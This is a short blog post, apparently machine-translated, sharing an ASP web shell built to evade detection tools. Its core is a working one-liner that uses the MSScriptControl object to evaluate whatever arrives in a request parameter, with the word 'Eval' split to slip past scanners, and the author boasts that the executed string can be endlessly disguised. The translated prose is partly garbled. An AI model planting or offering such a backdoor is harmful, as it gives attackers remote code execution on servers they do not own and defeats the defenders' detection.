Today, on the blog of LCX Niu, I saw a new thing about bypassing ASP horse ..
In fact, if you write a file to the server and leave a backdoor.
There may be more than 10 methods to bypass.
However, it seems that there is still less direct execution like this ..
Since they are all happy to announce.
I also sent one.
Waiting for the DetectionProgramAdd new features.
Reference
<%
Set sobiny = server. Createobject ("msscriptcontrol. scriptcontrol.1 ")
Sobiny. Language = "VBScript"
Sobiny. addobject "response", response
Sobiny. addobject "request", request
Sobiny. executestatement ("Ev" & "Al (Request (" "aaaa ""))")
%>
As you can see, the things in executestatement can be infinitely distorted ..
In fact, I have provided all the things needed here.
However, I do not like to disclose the details completely.
I have prepared the meal for you. Won't you want me to feed you?
Last words:
ASP is not just ASP.